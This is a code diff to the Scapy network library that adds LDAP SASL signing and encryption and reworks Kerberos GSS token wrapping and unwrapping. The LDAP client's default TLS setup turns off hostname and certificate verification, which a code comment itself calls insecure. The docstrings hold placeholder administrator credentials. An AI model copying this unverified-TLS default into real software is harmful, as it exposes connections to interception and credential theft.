"id-ce-holderNameConstraints" + "2.5.29.69": "id-ce-holderNameConstraints", + # [MS-WCCE] + "1.3.6.1.4.1.311.2.1.14": "CERT_EXTENSIONS", + "1.3.6.1.4.1.311.20.2": "ENROLL_CERTTYPE", + "1.3.6.1.4.1.311.25.1": "NTDS_REPLICATION", + "1.3.6.1.4.1.311.25.2": "NTDS_CA_SECURITY_EXT", + "1.3.6.1.4.1.311.25.2.1": "NTDS_OBJECTSID", } certExt_oids = { diff --git a/scapy/asn1fields.py b/scapy/asn1fields.py index e4957b0920d..9603526c29a 100644 --- a/scapy/asn1fields.py +++ b/scapy/asn1fields.py @@ -968,3 +968,22 @@ def i2repr(self, pkt, x): pretty_s = ", ".join(self.get_flags(pkt)) return pretty_s + " " + repr(x) return repr(x) + + +class ASN1F_STRING_PacketField(ASN1F_STRING): + """ + ASN1F_STRING that holds packets. + """ + holds_packets = 1 + + def i2m(self, pkt, val): + # type: (ASN1_Packet, Any) -> bytes + if hasattr(val, "ASN1_root"): + val = ASN1_STRING(bytes(val)) # type: ignore + return super(ASN1F_STRING_PacketField, self).i2m(pkt, val) + + def any2i(self, pkt, x): + # type: (ASN1_Packet, Any) -> Any + if hasattr(x, "add_underlayer"): + x.add_underlayer(pkt) + return super(ASN1F_STRING_PacketField, self).any2i(pkt, x) diff --git a/scapy/fields.py b/scapy/fields.py index eee8d6f9353..0caab13d1ff 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -2728,6 +2728,12 @@ def __init__(self, name, default, enum): super(LEShortEnumField, self).__init__(name, default, enum, " None + super(LongEnumField, self).__init__(name, default, enum, "Q") + + class LELongEnumField(EnumField[int]): def __init__(self, name, default, enum): # type: (str, int, Union[Dict[int, str], List[str]]) -> None diff --git a/scapy/layers/dcerpc.py b/scapy/layers/dcerpc.py index a70659e87c2..8878a3ed420 100644 --- a/scapy/layers/dcerpc.py +++ b/scapy/layers/dcerpc.py @@ -2697,10 +2697,11 @@ def in_pkt(self, pkt): and body ): # This is a request/response - self.ssp.GSS_Passive_set_Direction( - self.sspcontext, - IsAcceptor=DceRpc5Response in pkt, - ) + if self.sspcontext.passive: + self.ssp.GSS_Passive_set_Direction( + self.sspcontext, + IsAcceptor=DceRpc5Response in pkt, + ) if pkt.auth_verifier and pkt.auth_verifier.is_protected() and body: if self.sspcontext is None: return pkt diff --git a/scapy/layers/gssapi.py b/scapy/layers/gssapi.py index 1c637a6ce0b..5843047189b 100644 --- a/scapy/layers/gssapi.py +++ b/scapy/layers/gssapi.py @@ -151,6 +151,29 @@ def dispatch_hook(cls, _pkt=None, *args, **kargs): return cls +class _GSSAPI_Field(PacketField): + """ + PacketField that contains a GSSAPI_BLOB_SIGNATURE, but one that can + have a payload when not encrypted. + """ + __slots__ = ["pay_cls"] + + def __init__(self, name, pay_cls): + self.pay_cls = pay_cls + super().__init__( + name, + None, + GSSAPI_BLOB_SIGNATURE, + ) + + def getfield(self, pkt, s): + remain, val = super().getfield(pkt, s) + if remain and val: + val.payload = self.pay_cls(remain) + return b"", val + return remain, val + + # RFC2744 sect 3.9 - Status Values GSS_S_COMPLETE = 0 @@ -294,7 +317,7 @@ class CONTEXT: A Security context i.e. the 'state' of the secure negotiation """ - __slots__ = ["state", "flags", "passive"] + __slots__ = ["state", "_flags", "passive"] def __init__(self, req_flags: Optional[GSS_C_FLAGS] = None): if req_flags is None: @@ -310,6 +333,16 @@ def clifailure(self): # This allows to reset the client context without discarding it. pass + # 'flags' is the most important attribute. Use a setter to sanitize it. + + @property + def flags(self): + return self._flags + + @flags.setter + def flags(self, x): + self._flags = GSS_C_FLAGS(int(x)) + def __repr__(self): return "[Default SSP]" @@ -477,18 +510,30 @@ def GSS_Wrap( ], qop_req=qop_req, ) - return _msgs[0].data, signature + if _msgs[0].data: + signature /= _msgs[0].data + return signature # sect 2.3.4 - def GSS_Unwrap(self, Context: CONTEXT, input_message: bytes, signature): + def GSS_Unwrap(self, Context: CONTEXT, signature): + data = b"" + if signature.payload: + # signature has a payload that is the data. Let's get that payload + # in its original form, and use it for verifying the checksum. + if signature.payload.original: + data = signature.payload.original + else: + data = bytes(signature.payload) + signature = signature.copy() + signature.remove_payload() return self.GSS_UnwrapEx( Context, [ self.WRAP_MSG( conf_req_flag=True, sign=True, - data=input_message, + data=data, ) ], signature, diff --git a/scapy/layers/kerberos.py b/scapy/layers/kerberos.py index 7b4c06f7790..385e876db9f 100644 --- a/scapy/layers/kerberos.py +++ b/scapy/layers/kerberos.py @@ -79,11 +79,13 @@ ASN1F_SEQUENCE, ASN1F_SEQUENCE_OF, ASN1F_STRING, + ASN1F_STRING_PacketField, ASN1F_enum_INTEGER, ASN1F_optional, ) from scapy.asn1packet import ASN1_Packet from scapy.automaton import Automaton, ATMT +from scapy.config import conf from scapy.compat import bytes_encode from scapy.error import log_runtime from scapy.fields import ( @@ -411,21 +413,7 @@ def fromKey(self, key): ) -class _ASN1FString_PacketField(ASN1F_STRING): - holds_packets = 1 - - def i2m(self, pkt, val): - if isinstance(val, ASN1_Packet): - val = ASN1_STRING(bytes(val)) - return super(_ASN1FString_PacketField, self).i2m(pkt, val) - - def any2i(self, pkt, x): - if hasattr(x, "add_underlayer"): - x.add_underlayer(pkt) - return super(_ASN1FString_PacketField, self).any2i(pkt, x) - - -class _Checksum_Field(_ASN1FString_PacketField): +class _Checksum_Field(ASN1F_STRING_PacketField): def m2i(self, pkt, s): val = super(_Checksum_Field, self).m2i(pkt, s) if not val[0].val: @@ -547,7 +535,7 @@ class HostAddress(ASN1_Packet): } -class _AuthorizationData_value_Field(_ASN1FString_PacketField): +class _AuthorizationData_value_Field(ASN1F_STRING_PacketField): def m2i(self, pkt, s): val = super(_AuthorizationData_value_Field, self).m2i(pkt, s) if not val[0].val: @@ -685,7 +673,7 @@ class AD_AND_OR(ASN1_Packet): # RFC4120 -class _PADATA_value_Field(_ASN1FString_PacketField): +class _PADATA_value_Field(ASN1F_STRING_PacketField): """ A special field that properly dispatches PA-DATA values according to padata-type and if the paquet is a request or a response. @@ -847,7 +835,7 @@ class LSAP_TOKEN_INFO_INTEGRITY(Packet): # [MS-KILE] sect 2.2.6 -class _KerbAdRestrictionEntry_Field(_ASN1FString_PacketField): +class _KerbAdRestrictionEntry_Field(ASN1F_STRING_PacketField): def m2i(self, pkt, s): val = super(_KerbAdRestrictionEntry_Field, self).m2i(pkt, s) if not val[0].val: @@ -1038,7 +1026,7 @@ class KERB_DMSA_KEY_PACKAGE(ASN1_Packet): # RFC6113 sect 5.4.1 -class _KrbFastArmor_value_Field(_ASN1FString_PacketField): +class _KrbFastArmor_value_Field(ASN1F_STRING_PacketField): def m2i(self, pkt, s): val = super(_KrbFastArmor_value_Field, self).m2i(pkt, s) if not val[0].val: @@ -1792,7 +1780,7 @@ class MethodData(ASN1_Packet): ASN1_root = ASN1F_SEQUENCE_OF("seq", [PADATA()], PADATA) -class _KRBERROR_data_Field(_ASN1FString_PacketField): +class _KRBERROR_data_Field(ASN1F_STRING_PacketField): def m2i(self, pkt, s): val = super(_KRBERROR_data_Field, self).m2i(pkt, s) if not val[0].val: @@ -1940,7 +1928,7 @@ class KERB_EXT_ERROR(Packet): # [MS-KILE] sect 2.2.2 -class _Error_Field(_ASN1FString_PacketField): +class _Error_Field(ASN1F_STRING_PacketField): def m2i(self, pkt, s): val = super(_Error_Field, self).m2i(pkt, s) if not val[0].val: @@ -2130,6 +2118,16 @@ class KRB_InnerToken(Packet): ), ] + def mysummary(self): + return self.sprintf( + "Kerberos %s" % _TOK_IDS.get(self.TOK_ID, repr(self.TOK_ID)) + ) + + def guess_payload_class(self, payload): + if self.TOK_ID in [b"\x01\x01", b"\x02\x01", b"\x04\x04", b"\x05\x04"]: + return conf.padding_layer + return Kerberos + @classmethod def dispatch_hook(cls, _pkt=None, *args, **kargs): if _pkt and len(_pkt) >= 13: @@ -2173,6 +2171,9 @@ class KRB_GSS_MIC_RFC1964(Packet): ), ] + def default_payload_class(self, payload): + return conf.padding_layer + _InitialContextTokens[b"\x01\x01"] = KRB_GSS_MIC_RFC1964 @@ -2195,6 +2196,9 @@ class KRB_GSS_Wrap_RFC1964(Packet): XStrFixedLenField("CONFOUNDER", b"", length=8), ] + def default_payload_class(self, payload): + return conf.padding_layer + _InitialContextTokens[b"\x02\x01"] = KRB_GSS_Wrap_RFC1964 @@ -2230,6 +2234,9 @@ class KRB_GSS_MIC(Packet): XStrField("SGN_CKSUM", b"\x00" * 12), ] + def default_payload_class(self, payload): + return conf.padding_layer + _InitialContextTokens[b"\x04\x04"] = KRB_GSS_MIC @@ -2245,9 +2252,21 @@ class KRB_GSS_Wrap(Packet): ShortField("EC", 0), # Big endian ShortField("RRC", 0), # Big endian LongField("SND_SEQ", 0), # Big endian - XStrField("Data", b""), + MultipleTypeField( + [ + ( + XStrField("Data", b""), + lambda pkt: pkt.Flags.Sealed, + ) + ], + XStrLenField("Data", b"", + length_from=lambda pkt: pkt.EC), + ), ] + def default_payload_class(self, payload): + return conf.padding_layer + _InitialContextTokens[b"\x05\x04"] = KRB_GSS_Wrap @@ -2317,8 +2336,6 @@ def mysummary(self): _InitialContextTokens[b"\x04\x00"] = KRB_TGT_REQ _InitialContextTokens[b"\x04\x01"] = KRB_TGT_REP -bind_layers(KRB_InnerToken, Kerberos) - # RFC4120 sect 7.2.2 @@ -3411,7 +3428,10 @@ def GSS_WrapEx(self, Context, msgs, qop_req=0): - AES: RFC4121 sect 4.2.6.2 and [MS-KILE] sect 3.4.5.4.1 - HMAC-RC4: RFC4757 sect 7.3 and [MS-KILE] sect 3.4.5.4.1 """ - confidentiality = Context.flags & GSS_C_FLAGS.GSS_C_CONF_FLAG + # Is confidentiality in use? + confidentiality = (Context.flags & GSS_C_FLAGS.GSS_C_CONF_FLAG) and any( + x.conf_req_flag for x in msgs + ) if Context.KrbSessionKey.etype in [17, 18]: # AES # Build token tok = KRB_InnerToken( @@ -3579,8 +3599,8 @@ def GSS_UnwrapEx(self, Context, msgs, signature): - AES: RFC4121 sect 4.2.6.2 - HMAC-RC4: RFC4757 sect 7.3 """ - confidentiality = Context.flags & GSS_C_FLAGS.GSS_C_CONF_FLAG if Context.KrbSessionKey.etype in [17, 18]: # AES + confidentiality = signature.root.Flags.Sealed # Real separation starts now: RFC4121 sect 4.2.4 if confidentiality: # 0. Concatenate the data @@ -3629,6 +3649,9 @@ def MakeToSign(Confounder, DecText): if msg.conf_req_flag: msg.data = Data[offset : offset + msglen] offset += msglen + # Case without msgs + if len(msgs) == 1 and not msgs[0].data: + msgs[0].data = Data return msgs else: # No confidentiality is requested @@ -3656,10 +3679,9 @@ def MakeToSign(Confounder, DecText): # 4. Compare if sig != Mic: raise ValueError("ERROR: Checksums don't match") - # 5. Split - for msg in msgs: - if msg.sign: - msg.data = Data + # Case without msgs + if len(msgs) == 1 and not msgs[0].data: + msgs[0].data = Data return msgs elif Context.KrbSessionKey.etype in [23, 24]: # RC4 from scapy.libs.rfc3961 import Hmac_MD5, Cipher, algorithms, _rfc1964pad @@ -3667,6 +3689,9 @@ def MakeToSign(Confounder, DecText): # Drop wrapping tok = signature.innerToken + # Detect confidentiality + confidentiality = tok.root.SEAL_ALG != 0xFFFF + # 0. Concatenate data ToDecrypt = b"".join(x.data for x in msgs if x.conf_req_flag) Kss = Context.KrbSessionKey.key @@ -4048,7 +4073,7 @@ def GSS_Accept_sec_context(self, Context: CONTEXT, val=None): if authenticator.cksum: if authenticator.cksum.cksumtype == 0x8003: # KRB-Authenticator - Context.flags = GSS_C_FLAGS(int(authenticator.cksum.checksum.Flags)) + Context.flags = authenticator.cksum.checksum.Flags # Build response (RFC4120 sect 3.2.4) ap_rep = KRB_AP_REP(encPart=EncryptedData()) ap_rep.encPart.encrypt( @@ -4106,7 +4131,7 @@ def GSS_Passive(self, Context: CONTEXT, val=None): if Context.state == self.STATE.INIT: Context, _, status = self.GSS_Accept_sec_context(Context, val) Context.state = self.STATE.CLI_SENT_APREQ - return Context, status + return Context, GSS_S_CONTINUE_NEEDED elif Context.state == self.STATE.CLI_SENT_APREQ: Context, _, status = self.GSS_Init_sec_context(Context, val) return Context, status diff --git a/scapy/layers/ldap.py b/scapy/layers/ldap.py index 8f53ec7c835..494809a6ab7 100644 --- a/scapy/layers/ldap.py +++ b/scapy/layers/ldap.py @@ -12,6 +12,10 @@ Note: to mimic Microsoft Windows LDAP packets, you must set:: conf.ASN1_default_long_size = 4 + +.. note:: + You will find more complete documentation for this layer over at + `LDAP `_ """ import collections @@ -29,24 +33,31 @@ ASN1_Class, ASN1_Codecs, ) -from scapy.asn1.ber import BERcodec_STRING +from scapy.asn1.ber import ( + BERcodec_STRING, + BER_id_dec, + BER_len_dec, +) from scapy.asn1fields import ( + ASN1F_badsequence, ASN1F_BOOLEAN, ASN1F_CHOICE, ASN1F_ENUMERATED, ASN1F_INTEGER, ASN1F_NULL, + ASN1F_optional, ASN1F_PACKET, - ASN1F_SEQUENCE, ASN1F_SEQUENCE_OF, + ASN1F_SEQUENCE, ASN1F_SET_OF, ASN1F_STRING, - ASN1F_optional, + ASN1F_STRING_PacketField, ) from scapy.asn1packet import ASN1_Packet from scapy.config import conf from scapy.error import log_runtime from scapy.fields import ( + FieldLenField, FlagsField, ThreeBytesField, ) @@ -59,21 +70,20 @@ from scapy.supersocket import ( SimpleSocket, StreamSocket, + SSLStreamSocket, ) from scapy.layers.dns import dns_resolve from scapy.layers.inet import IP, TCP, UDP from scapy.layers.inet6 import IPv6 from scapy.layers.gssapi import ( + _GSSAPI_Field, GSS_C_FLAGS, GSS_S_COMPLETE, - GSSAPI_BLOB, GSSAPI_BLOB_SIGNATURE, + GSSAPI_BLOB, SSP, ) -from scapy.layers.kerberos import ( - _ASN1FString_PacketField, -) from scapy.layers.netbios import NBTDatagram from scapy.layers.smb import ( NETLOGON, @@ -170,20 +180,20 @@ class ASN1_Class_LDAP(ASN1_Class): SearchRequest = 0x63 SearchResultEntry = 0x64 SearchResultDone = 0x65 - SearchResultReference = 0x66 - ModifyRequest = 0x67 - ModifyResponse = 0x68 - AddRequest = 0x69 - AddResponse = 0x6A - DelRequest = 0x6B - DelResponse = 0x6C - ModifyDNRequest = 0x6D - ModifyDNResponse = 0x6E - CompareRequest = 0x6F - CompareResponse = 0x70 - AbandonRequest = 0x71 - ExtendedRequest = 0x72 - ExtendedResponse = 0x73 + ModifyRequest = 0x66 + ModifyResponse = 0x67 + AddRequest = 0x68 + AddResponse = 0x69 + DelRequest = 0x4A # not constructed + DelResponse = 0x6B + ModifyDNRequest = 0x6C + ModifyDNResponse = 0x6D + CompareRequest = 0x6E + CompareResponse = 0x7F + AbandonRequest = 0x50 # application + primitive + SearchResultReference = 0x73 + ExtendedRequest = 0x77 + ExtendedResponse = 0x78 # Bind operation @@ -284,7 +294,7 @@ class ASN1F_LDAP_Authentication_sicilyResponse(ASN1F_STRING): _SASL_MECHANISMS = {b"GSS-SPNEGO": GSSAPI_BLOB, b"GSSAPI": GSSAPI_BLOB} -class _SaslCredentialsField(_ASN1FString_PacketField): +class _SaslCredentialsField(ASN1F_STRING_PacketField): def m2i(self, pkt, s): val = super(_SaslCredentialsField, self).m2i(pkt, s) if not val[0].val: @@ -336,8 +346,6 @@ class LDAP_BindResponse(ASN1_Packet): # LDAP_Authentication_SaslCredentials ASN1F_STRING("serverSaslCredsWrap", "", implicit_tag=0xA7), ), - ) - + ( ASN1F_optional( ASN1F_STRING("serverSaslCreds", "", implicit_tag=0x87), ), @@ -454,7 +462,7 @@ class LDAP_FilterOr(ASN1_Packet): class LDAP_FilterPresent(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER - ASN1_root = AttributeType("present", "") + ASN1_root = AttributeType("present", "objectClass") class LDAP_FilterEqual(ASN1_Packet): @@ -624,6 +632,8 @@ class LDAP_AbandonRequest(ASN1_Packet): # LDAP v3 +# RFC 4511 sect 4.1.11 + class LDAP_Control(ASN1_Packet): ASN1_codec = ASN1_Codecs.BER @@ -636,7 +646,37 @@ class LDAP_Control(ASN1_Packet): ) -# LDAP +# RFC 4511 sect 4.12 - Extended Operation + + +class LDAP_ExtendedResponse(ASN1_Packet): + ASN1_codec = ASN1_Codecs.BER + ASN1_root = ASN1F_SEQUENCE( + *( + LDAPResult + + ( + ASN1F_optional(LDAPOID("responseName", None, implicit_tag=0x8A)), + ASN1F_optional(ASN1F_STRING("responseValue", None, implicit_tag=0x8B)), + ) + ), + implicit_tag=ASN1_Class_LDAP.ExtendedResponse, + ) + + def do_dissect(self, x): + # Note: Windows builds this packet with a buggy sequence size, that does not + # include the optional fields. Do another pass of dissection on the optionals. + s = super(LDAP_ExtendedResponse, self).do_dissect(x) + if not s: + return s + for obj in self.ASN1_root.seq[-2:]: # only on the 2 optional fields + try: + s = obj.dissect(self, s) + except ASN1F_badsequence: + break + return s + + +# LDAP main class class LDAP(ASN1_Packet): @@ -653,6 +693,7 @@ class LDAP(ASN1_Packet): LDAP_SearchResponseResultDone, LDAP_AbandonRequest, LDAP_UnbindRequest, + LDAP_ExtendedResponse, ), # LDAP v3 only ASN1F_optional( @@ -660,7 +701,31 @@ class LDAP(ASN1_Packet): ), ) + show_indent = 0 + + @classmethod + def dispatch_hook(cls, _pkt=None, *args, **kargs): + if _pkt and len(_pkt) >= 4: + # Heuristic to detect SASL_Buffer + if _pkt[0] != 0x30: + if struct.unpack("!I", _pkt[:4])[0] + 4 == len(_pkt): + return LDAP_SASL_Buffer + return conf.raw_layer + return cls + + def hashret(self): + return b"ldap" + + @property + def unsolicited(self): + # RFC4511 sect 4.4. - Unsolicited Notification + return self.messageID == 0 and isinstance( + self.protocolOp, LDAP_ExtendedResponse + ) + def answers(self, other): + if self.unsolicited: + return True return isinstance(other, LDAP) and other.messageID == self.messageID def mysummary(self): @@ -744,10 +809,10 @@ def is_request(self, req): if NBTDatagram in req: # special case: mailslot ping from scapy.layers.smb import SMBMailslot_Write, NETLOGON_SAM_LOGON_REQUEST + try: return ( - SMBMailslot_Write in req and - NETLOGON_SAM_LOGON_REQUEST in req.Data + SMBMailslot_Write in req and NETLOGON_SAM_LOGON_REQUEST in req.Data ) except AttributeError: return False @@ -838,19 +903,24 @@ def make_mailslot_ping_reply(self, req): DcSockAddr, NETLOGON_SAM_LOGON_RESPONSE_EX, ) + resp = IP(dst=req[IP].src) / UDP( sport=req.dport, dport=req.sport, ) address = self.src_ip or get_if_addr(self.optsniff.get("iface", conf.iface)) - resp /= NBTDatagram( - SourceName=req.DestinationName, - SUFFIX1=req.SUFFIX2, - DestinationName=req.SourceName, - SUFFIX2=req.SUFFIX1, - SourceIP=address, - ) / SMB_Header() / SMBMailslot_Write( - Name=req.Data.MailslotName, + resp /= ( + NBTDatagram( + SourceName=req.DestinationName, + SUFFIX1=req.SUFFIX2, + DestinationName=req.SourceName, + SUFFIX2=req.SUFFIX1, + SourceIP=address, + ) + / SMB_Header() + / SMBMailslot_Write( + Name=req.Data.MailslotName, + ) ) NetbiosDomainName = req.DestinationName.strip() resp.Data = NETLOGON_SAM_LOGON_RESPONSE_EX( @@ -1051,7 +1121,7 @@ def dclocator( class LDAP_BIND_MECHS(Enum): - NONE = "NONE" + NONE = "UNAUTHENTICATED" SIMPLE = "SIMPLE" SASL_GSSAPI = "GSSAPI" SASL_GSS_SPNEGO = "GSS-SPNEGO" @@ -1082,106 +1152,127 @@ class LDAP_SASL_GSSAPI_SsfCap(Packet): ] +class LDAP_SASL_Buffer(Packet): + """ + RFC 4422 sect 3.7 + """ + + # "Each buffer of protected data is transferred over the underlying + # transport connection as a sequence of octets prepended with a four- + # octet field in network byte order that represents the length of the + # buffer." + + fields_desc = [ + FieldLenField("BufferLength", None, + fmt="!I", length_of="Buffer"), + _GSSAPI_Field("Buffer", LDAP), + ] + + def hashret(self): + return b"ldap" + + def answers(self, other): + return isinstance(other, LDAP_SASL_Buffer) + + @classmethod + def tcp_reassemble(cls, data, *args, **kwargs): + if len(data) < 4: + return None + if data[0] == 0x30: + # Add a heuristic to detect LDAP errors + xlen, x = BER_len_dec(BER_id_dec(data)[1]) + if xlen and xlen == len(x): + return LDAP(data) + # Check BufferLength + length = struct.unpack("!I", data[:4])[0] + 4 + if len(data) >= length: + return cls(data) + + class LDAP_Client(object): """ A basic LDAP client - :param mech: one of LDAP_BIND_MECHS - :param ssl: whether to use LDAPS or not - :param ssp: the SSP object to use for binding - - :param sign: request signing when binding - :param encrypt: request encryption when binding + The complete documentation is available at + https://scapy.readthedocs.io/en/latest/layers/ldap.html - Example 1 - SICILY - NTLM:: + Example 1 - SICILY - NTLM (with encryption):: + client = LDAP_Client() + client.connect("192.168.0.100") ssp = NTLMSSP(UPN="Administrator", PASSWORD="Password1!") - client = LDAP_Client( + client.bind( LDAP_BIND_MECHS.SICILY, ssp=ssp, + encrypt=True, ) - client.connect("192.168.0.100") - client.bind() - Example 2 - SASL_GSSAPI - Kerberos:: + Example 2 - SASL_GSSAPI - Kerberos (with signing):: + client = LDAP_Client() + client.connect("192.168.0.100") ssp = KerberosSSP(UPN="Administrator@domain.local", PASSWORD="Password1!", SPN="ldap/dc1.domain.local") - client = LDAP_Client( + client.bind( LDAP_BIND_MECHS.SASL_GSSAPI, ssp=ssp, + sign=True, ) - client.connect("192.168.0.100") - client.bind() Example 3 - SASL_GSS_SPNEGO - NTLM / Kerberos:: + client = LDAP_Client() + client.connect("192.168.0.100") ssp = SPNEGOSSP([ NTLMSSP(UPN="Administrator", PASSWORD="Password1!"), KerberosSSP(UPN="Administrator@domain.local", PASSWORD="Password1!", SPN="ldap/dc1.domain.local"), ]) - client = LDAP_Client( + client.bind( LDAP_BIND_MECHS.SASL_GSS_SPNEGO, ssp=ssp, ) - client.connect("192.168.0.100") - client.bind() - Example 4 - Simple bind:: + Example 4 - Simple bind over TLS:: - client = LDAP_Client(LDAP_BIND_MECHS.SIMPLE) - client.connect("192.168.0.100") - client.bind(simple_username="Administrator", - simple_password="Password1!") + client = LDAP_Client() + client.connect("192.168.0.100", use_ssl=True) + client.bind( + LDAP_BIND_MECHS.SIMPLE, + simple_username="Administrator", + simple_password="Password1!", + ) """ def __init__( self, - mech, verb=True, - ssl=False, - sslcontext=None, - ssp=None, - sign=False, - encrypt=False, ): self.sock = None - self.mech = mech self.verb = verb - self.ssl = ssl - self.sslcontext = sslcontext - self.ssp = ssp # type: SSP - assert isinstance(mech, LDAP_BIND_MECHS) - if mech == LDAP_BIND_MECHS.SASL_GSSAPI: - from scapy.layers.kerberos import KerberosSSP - - if not isinstance(self.ssp, KerberosSSP): - raise ValueError("Only raw KerberosSSP is supported with SASL_GSSAPI !") - elif mech == LDAP_BIND_MECHS.SASL_GSS_SPNEGO: - from scapy.layers.spnego import SPNEGOSSP - - if not isinstance(self.ssp, SPNEGOSSP): - raise ValueError("Only SPNEGOSSP is supported with SASL_GSS_SPNEGO !") - elif mech == LDAP_BIND_MECHS.SICILY: - from scapy.layers.ntlm import NTLMSSP - - if not isinstance(self.ssp, NTLMSSP): - raise ValueError("Only raw NTLMSSP is supported with SICILY !") - if self.ssp is not None and mech in [ - LDAP_BIND_MECHS.NONE, - LDAP_BIND_MECHS.SIMPLE, - ]: - raise ValueError("%s cannot be used with a ssp !" % mech.value) + self.ssl = False + self.sslcontext = None + self.ssp = None self.sspcontext = None - self.sign = sign - self.encrypt = encrypt + self.encrypt = False + self.sign = False + # Session status + self.sasl_wrap = False self.messageID = 0 - def connect(self, ip, port=None, timeout=5): + def connect(self, ip, port=None, use_ssl=False, sslcontext=None, timeout=5): """ Initiate a connection + + :param ip: the IP to connect to. + :param port: the port to connect to. (Default: 389 or 636) + + :param use_ssl: whether to use LDAPS or not. (Default: False) + :param sslcontext: an optional SSLContext to use. """ + self.ssl = use_ssl + self.sslcontext = sslcontext + if port is None: if self.ssl: port = 636 @@ -1208,44 +1299,134 @@ def connect(self, ip, port=None, timeout=5): if self.ssl: if self.sslcontext is None: context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT) + # Hm, this is insecure. context.check_hostname = False context.verify_mode = ssl.CERT_NONE else: context = self.sslcontext sock = context.wrap_socket(sock) - self.sock = StreamSocket(sock, LDAP) + if self.ssl: + self.sock = SSLStreamSocket(sock, LDAP) + else: + self.sock = StreamSocket(sock, LDAP) def sr1(self, protocolOp, controls=None, **kwargs): self.messageID += 1 if self.verb: print(conf.color_theme.opening(">> %s" % protocolOp.__class__.__name__)) + # Build packet + pkt = LDAP( + messageID=self.messageID, + protocolOp=protocolOp, + Controls=controls, + ) + # If signing / encryption is used, apply + if self.sasl_wrap: + pkt = LDAP_SASL_Buffer( + Buffer=self.ssp.GSS_Wrap( + self.sspcontext, + bytes(pkt), + conf_req_flag=self.encrypt, + ) + ) + # Send / Receive resp = self.sock.sr1( - LDAP( - messageID=self.messageID, - protocolOp=protocolOp, - Controls=controls, - ), + pkt, verbose=0, **kwargs, ) + # Check for unsolicited notification + if resp and LDAP in resp and resp[LDAP].unsolicited: + resp.show() + if self.verb: + print(conf.color_theme.fail("! Got unsolicited notification.")) + return resp + # If signing / encryption is used, unpack + if self.sasl_wrap: + if resp.Buffer: + resp = LDAP( + self.ssp.GSS_Unwrap( + self.sspcontext, + resp.Buffer, + ) + ) + else: + resp = None if self.verb: - print( - conf.color_theme.success( - "<< %s" - % ( - resp.protocolOp.__class__.__name__ - if LDAP in resp - else resp.__class__.__name__ + if not resp: + print(conf.color_theme.fail("! Bad response.")) + else: + print( + conf.color_theme.success( + "<< %s" + % ( + resp.protocolOp.__class__.__name__ + if LDAP in resp + else resp.__class__.__name__ + ) ) ) - ) return resp - def bind(self, simple_username=None, simple_password=None): + def bind( + self, + mech, + ssp=None, + sign=False, + encrypt=False, + simple_username=None, + simple_password=None, + ): """ Send Bind request. + + :param mech: one of LDAP_BIND_MECHS + :param ssp: the SSP object to use for binding + + :param sign: request signing when binding + :param encrypt: request encryption when binding + + : This acts differently based on the :mech: provided during initialization. """ + # Store and check consistency + self.mech = mech + self.ssp = ssp # type: SSP + self.sign = sign + self.encrypt = encrypt + + assert isinstance(mech, LDAP_BIND_MECHS) + if mech == LDAP_BIND_MECHS.SASL_GSSAPI: + from scapy.layers.kerberos import KerberosSSP + + if not isinstance(self.ssp, KerberosSSP): + raise ValueError("Only raw KerberosSSP is supported with SASL_GSSAPI !") + elif mech == LDAP_BIND_MECHS.SASL_GSS_SPNEGO: + from scapy.layers.spnego import SPNEGOSSP + + if not isinstance(self.ssp, SPNEGOSSP): + raise ValueError("Only SPNEGOSSP is supported with SASL_GSS_SPNEGO !") + elif mech == LDAP_BIND_MECHS.SICILY: + from scapy.layers.ntlm import NTLMSSP + + if not isinstance(self.ssp, NTLMSSP): + raise ValueError("Only raw NTLMSSP is supported with SICILY !") + if self.sign and not self.encrypt: + raise ValueError( + "NTLM on LDAP does not support signing without encryption !" + ) + elif mech == LDAP_BIND_MECHS.NONE: + if self.sign or self.encrypt: + raise ValueError( + "Cannot use 'sign' or 'encrypt' with unauthenticated (NONE) !" + ) + if self.ssp is not None and mech in [ + LDAP_BIND_MECHS.NONE, + LDAP_BIND_MECHS.SIMPLE, + ]: + raise ValueError("%s cannot be used with a ssp !" % mech.value) + + # Now perform the bind, depending on the mech if self.mech == LDAP_BIND_MECHS.SIMPLE: # Simple binding resp = self.sr1( @@ -1322,6 +1503,7 @@ def bind(self, simple_username=None, simple_password=None): self.sspcontext, token, status = self.ssp.GSS_Init_sec_context( self.sspcontext, req_flags=( + # Required flags for GSSAPI: RFC4752 sect 3.1 GSS_C_FLAGS.GSS_C_REPLAY_FLAG | GSS_C_FLAGS.GSS_C_SEQUENCE_FLAG | GSS_C_FLAGS.GSS_C_MUTUAL_FLAG @@ -1351,8 +1533,11 @@ def bind(self, simple_username=None, simple_password=None): self.sspcontext, token, status = self.ssp.GSS_Init_sec_context( self.sspcontext, GSSAPI_BLOB(val) ) + else: + status = GSS_S_COMPLETE if status != GSS_S_COMPLETE: - raise RuntimeError("%s bind returned %s !" % (self.mech.name, status)) + resp.show() + raise RuntimeError("%s bind failed !" % self.mech.name) elif self.mech == LDAP_BIND_MECHS.SASL_GSSAPI: # GSSAPI has 2 extra exchanges # https://datatracker.ietf.org/doc/html/rfc2222#section-7.2.1 @@ -1366,10 +1551,11 @@ def bind(self, simple_username=None, simple_password=None): ) ) # Parse server-supported layers - saslOptions = GSSAPI_BLOB_SIGNATURE(resp.protocolOp.serverSaslCredsData) - saslOptions.show() saslOptions = LDAP_SASL_GSSAPI_SsfCap( - self.ssp.GSS_Unwrap(self.sspcontext, b"", saslOptions) + self.ssp.GSS_Unwrap( + self.sspcontext, + GSSAPI_BLOB_SIGNATURE(resp.protocolOp.serverSaslCredsData), + ) ) if self.sign and not saslOptions.supported_security_layers.INTEGRITY: raise RuntimeError("GSSAPI SASL failed to negotiate INTEGRITY !") @@ -1380,12 +1566,14 @@ def bind(self, simple_username=None, simple_password=None): raise RuntimeError("GSSAPI SASL failed to negotiate CONFIDENTIALITY !") # Announce client-supported layers saslOptions = LDAP_SASL_GSSAPI_SsfCap( - supported_security_layers=( - "NONE" - + ("+INTEGRITY" if self.sign else "") - + ("+CONFIDENTIALITY" if self.encrypt else "") - ), - max_output_token_size=0xA00000, + supported_security_layers="+".join( + (["INTEGRITY"] if self.sign else []) + + (["CONFIDENTIALITY"] if self.encrypt else []) + ) + if (self.sign or self.encrypt) + else "NONE", + # Same as server + max_output_token_size=saslOptions.max_output_token_size, ) resp = self.sr1( LDAP_BindRequest( @@ -1393,8 +1581,11 @@ def bind(self, simple_username=None, simple_password=None): authentication=LDAP_Authentication_SaslCredentials( mechanism=ASN1_STRING(self.mech.value), credentials=self.ssp.GSS_Wrap( - self.sspcontext, 